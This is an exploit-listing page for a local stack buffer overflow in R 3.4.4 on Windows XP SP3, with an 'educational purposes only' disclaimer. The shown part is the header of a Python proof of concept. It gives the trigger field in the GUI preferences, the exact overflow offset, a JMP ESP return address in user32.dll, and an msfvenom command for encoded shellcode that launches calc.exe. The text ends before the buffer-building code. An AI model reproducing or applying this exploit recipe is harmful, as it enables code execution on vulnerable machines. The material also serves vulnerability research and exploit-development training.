R 3.4.4 xp sp3 buffer overflow (non seh) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-01-28
Type: local
Platform: windows
This exploit / vulnerability (R 3.4.4 xp sp3 buffer overflow (non seh)) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/python
# Exploit Title: R 3.4.4 - Local Buffer Overflow (Windows XP SP3)
# Date: 21/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://cloud.r-project.org/bin/windows/
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems
# Version: 3.4.4
# Tested on: Windows XP Prof SP3 ENG x86
# Note: No SEH exploitation required (SEH for Windows 7 by ZwX available on exploit-db).
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# Used alpha_upper with "\x00" for badchars
# PoC:
# 1.) Generate exploit-calc-final.txt, copy the contents to clipboard
# 2.) Open the app, select 'Edit', then select 'GUI preferences'
# 3.) Paste the contents of exploit-calc-final.txt under 'Language for menus and messages'
# 4.) Click OK
#Exact offset 292
#7E429353 FFE4 JMP ESP - user32.dll
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b '\x00' -f c